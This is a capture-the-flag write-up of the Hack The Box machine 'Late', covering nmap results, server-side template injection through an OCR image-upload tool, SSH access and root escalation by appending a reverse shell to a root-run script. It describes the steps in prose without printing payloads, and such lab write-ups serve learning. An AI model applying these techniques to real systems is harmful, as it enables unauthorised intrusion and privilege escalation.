PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA) | 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA) |_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-title: Late - Best online image tools |_http-server-header: nginx/1.14.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Out of the blocks we don’t really have a lot to go off, so straight to the web app to see if we can break something. We’re given a subdomain (images.late.htb) from the landing page so we’ll have a look.
If we try to bypass the filter by renaming a php.jpg we get the following error, leaking the files location.etc but no hope of running a reverse PHP shell.
We can see from the web page it’s running an OCR script in Flask, so we can try some SSTI inside an image. Uploading SSTI input as text gives us the following…
After many many failed attempts to execute commands I finally realise is the issue is not in filters but the OCR failing to read the input properly. If we strip the {{ }} tags we can see what the OCR is reading, and after a lot of trial and error find a typeface, size and kerning combination that allows us to get code execution.
We don’t seem to be able to execute commands on the server, to curl / ping / nc etc… but there was an open SSH port and we know which user we’ve access to, so what if…
Well there we go, that’ll be a way in.
Without a password we’re not allowed to sudo -L, so I’ll upload my favourite buddies (Linpeas and PSpy) and see what’s going on, then I’ll get to work scouring through filesystems if nothing else is available.
Linpeas tells us we have write privs inside a path folder and inside is a script being run by root regularly. Because of chattr +a allowing us to only append to this file, we can probably just append a reverse shell to the bottom and see what happens…
It’s being re-written every minute so we have to move fast.
There we go, a shell as root. Get the flag. Box done.
Other than the OCR fiddling with typefaces this box ended up being straight forward but was a nice reminder that HTB does have some easier rooms!